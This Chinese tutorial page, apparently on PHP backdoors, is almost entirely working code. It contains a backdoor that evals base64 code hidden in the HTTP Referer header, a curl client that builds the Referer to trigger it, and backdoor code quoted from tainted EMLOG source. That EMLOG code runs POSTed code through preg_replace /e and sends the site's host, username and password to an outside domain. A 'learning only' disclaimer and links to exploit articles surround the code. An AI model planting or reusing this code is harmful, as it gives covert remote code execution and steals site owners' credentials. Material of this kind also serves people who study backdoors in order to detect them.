手机
当前位置:查字典教程网 > >脚本攻防 >一些常见的PHP后门原理分析
一些常见的PHP后门原理分析
摘要:本地测试结果如下图。本程序只作为学习作用,请勿拿去做坏事。复制代码代码如下:

本地测试结果如下图。

本程序只作为学习作用,请勿拿去做坏事。

复制代码代码如下:

<?php

//1.php

header('Content-type:text/html;charset=utf-8');

parse_str($_SERVER['HTTP_REFERER'], $a);

if(reset($a) == '10' && count($a) == 9) {

eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));

}<?php

//2.php

header('Content-type:text/html;charset=utf-8');

//要执行的代码

$code = <<<CODE

phpinfo();

CODE;

//进行base64编码

$code = base64_encode($code);

//构造referer字符串

$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

//后门url

$url = 'http://localhost/test1/1.php';

$ch = curl_init();

$options = array(

CURLOPT_URL => $url,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array($ch, $options);

echo curl_exec($ch);

一些常见的PHP后门原理分析1

最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码

复制代码代码如下:

if (isset($_GET["rsdsrv"])) {

if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){

@preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");

}

}

file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));

【一些常见的PHP后门原理分析】相关文章:

SQL注入攻防入门详解 [图文并茂] 附示例下载

serv-u最新通杀所有版本0day asp代码

Python 爬虫使用动态切换ip防止封杀

使用参数化查询防止SQL注入漏洞

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

讯时漏洞一小结

脚本入侵 ASP网站入侵常用的一些技巧分享

后台登入框注入拿shell步骤

php版shell.users加管理员帐号的方法

网站个人渗透技巧收集与总结

精品推荐
分类导航